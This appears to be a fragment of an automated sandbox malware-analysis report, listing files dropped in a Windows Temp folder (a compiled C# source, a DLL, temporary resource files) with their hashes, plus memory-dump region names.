SHA512 9aeaa37daee48bcc70c118e4991cb8603c7a578bf977de59dd3968235733aedf19d2cba9d7e5a5e769ab0fa9f209e2e419e2663e1eee529569def5560434c0ca

\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\CSC6226AC086F4E495C90E0385C98AC523.TMP

MD5 0fc7e3b5823de0eba90ba6f0cc7c95cd
SHA1 e0862ceb51e4f7ff5c1e99095281815e4c8a7574
SHA256 ceb7cc720416a00145b1d6790ffd5962a1ff451584900e48e3d7dd97c15f32a7
SHA512 e70423ef046dc790bb219fa1e6f16cc1e7ae84c36b610a8ea85179b374abdd490b899e55839bd81b39356390ded13b755c0bfd04abeb7b8885be264598bb094c

C:\Users\Admin\AppData\Local\Temp\RES87ED.tmp

MD5 125233ee95e2b97a65590b158a469d44
SHA1 efb7a66627103b81641a8d87cade40764becc199
SHA256 e843e7eeed35241471ecd20225082cbdda00dea642e84e1f67d4a8e55869e824
SHA512 3525e8410c5555f16a385f6c44af31cc9f9e171f42fe211c407b35bfe6f246e4a411c340d09a6a89ade696a0d226418945b570c965ced4ffd3dd83b705aacc8b

C:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.dll

MD5 d44190194ef0411c6f6522635a7584de
SHA1 82bb3e7d63bffb795d555355c4df83a1332c419d
SHA256 bef0e7f6af880adbe302c85fa2b5711efd1b2557630753e111dab00b3a4b7060
SHA512 3a8caf0dca8e940894dc5e22488c1bffa94f570724397ea80c2c343f0321a507237193a51e2d83b251209de1cd117e6647bf0df53ae6d1f5a0a68ec40e5826c2

memory/5036-57-0x000002C19C160000-0x000002C19C168000-memory.dmp

memory/832-62-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-63-0x00007FFCF728D000-0x00007FFCF728E000-memory.dmp

memory/832-64-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-68-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-69-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 faa26f75dcbe70cb3cb49fbed6d1d880
SHA1 086ed1a9153fc9e721290261dd2c7c9d61003008
SHA256 65d6187f238f62c59fd29fe1e129743f32db1b377f9add779ab1781b2e8d9c9e
SHA512 29f6bed11f20dbb1e3fa919bad240f814ee8ee66f59593ba82a3e96e4a269bbfb88f15443bfb17e1b93fd8dd0028ef5e85e8c9671b05e9af7bfb377cc7f98c4d